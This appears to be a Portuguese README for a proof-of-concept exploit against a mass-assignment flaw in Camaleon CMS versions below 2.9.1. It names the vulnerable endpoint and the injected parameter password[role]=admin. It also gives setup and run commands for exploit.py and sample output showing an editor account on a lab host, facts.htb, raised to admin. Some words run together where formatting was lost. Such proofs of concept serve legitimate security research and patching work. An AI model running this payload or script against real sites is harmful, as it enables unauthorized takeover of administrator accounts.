
Exploração de prova de conceito para uma vulnerabilidade de escalonamento de privilégio por mass assignment no Camaleon CMS < 2.9.1. Usuários autenticados de baixo privilégio podem escalar para admin injetando parâmetros de função.
Vulnerabilidade de escalação de privilégios no Camaleon CMS < 2.9.1. O endpoint
updated_ajaxnoUsersControllerchamaparams.require(:password).permit!sem filtragem, permitindo que qualquer parâmetro seja atribuído em massa. Um usuário autenticado com privilégios baixos pode escalar para admin injetandopassword[role]=adminjunto com uma solicitação de alteração de senha.
/admin/users/<id>/updated_ajax com password[role]=admin injetado nos parâmetros de senha.python3 -m venv venv
source venv/bin/activate
python3 -m pip install requests beautifulsoup4
python3 exploit.py http://TARGET -u USER -p PASS
Exemplo:
$ python3 exploit.py http://facts.htb -u esteban -p password123
[*] Logging in as esteban...
[+] Logged in successfully
[*] User ID: 3, current role: editor
[*] Sending exploit payload...
[+] Privilege escalation successful! User is now admin.
[+] Login at http://facts.htb/admin with your credentials.